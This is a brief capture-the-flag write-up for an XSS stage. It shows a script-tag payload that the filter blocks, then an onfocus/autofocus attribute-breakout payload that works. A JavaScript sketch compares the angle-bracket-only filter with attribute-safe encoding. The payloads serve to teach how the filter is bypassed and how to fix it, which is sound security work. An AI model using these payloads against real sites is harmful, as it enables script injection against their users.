Stage # 6


Solution


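No. 6

I tried entering "><script>alert(document.domain)</script>.

The < and > characters are filtered, so the XSS does not execute.

< and > are converted to &lt; and &gt;.

The XSS has to be triggered without using < or >.

This can be done with an event handler.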

" onfocus =alert(document.domain); autofocus

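The sketch below is an added example, not code from the challenge or the original post. It models the filter described above (only < and > encoded) next to an attribute-safe encoder and checks whether the handler payload from this write-up ends up as a real attribute. The function names, the field name and the input template are assumptions.

```javascript
// Filter as described in the write-up: only angle brackets are encoded.
function anglesOnlyEscape(s) {
  return s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Attribute-safe encoding: also encodes &, " and ' so the value cannot
// close the quoted attribute it is written into.
function attrEscape(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Assumed template: the reflected value lands inside a double-quoted attribute.
function renderInput(value, escapeFn) {
  return '<input type="text" name="field" value="' + escapeFn(value) + '">';
}

// Small tokenizer for one start tag: returns the attribute names a browser
// would see (quoted values are consumed whole, so their content is ignored).
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+/, "").replace(/>$/, "");
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when the rendered tag carries an on* event-handler attribute.
function hasInjectedHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith("on"));
}

// Payloads quoted from the write-up.
const scriptPayload = '"><script>alert(document.domain)</script>';
const handlerPayload = '" onfocus =alert(document.domain); autofocus';

console.log(renderInput(handlerPayload, anglesOnlyEscape));
console.log(renderInput(handlerPayload, attrEscape));
```

With the angle-bracket filter the double quote still closes the value, so onfocus and autofocus are parsed as attributes of the input; once the quote is encoded, the whole payload stays inside value.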
 

REF

portswigger.net/web-security/cross-site-scripting/cheat-sheet

 
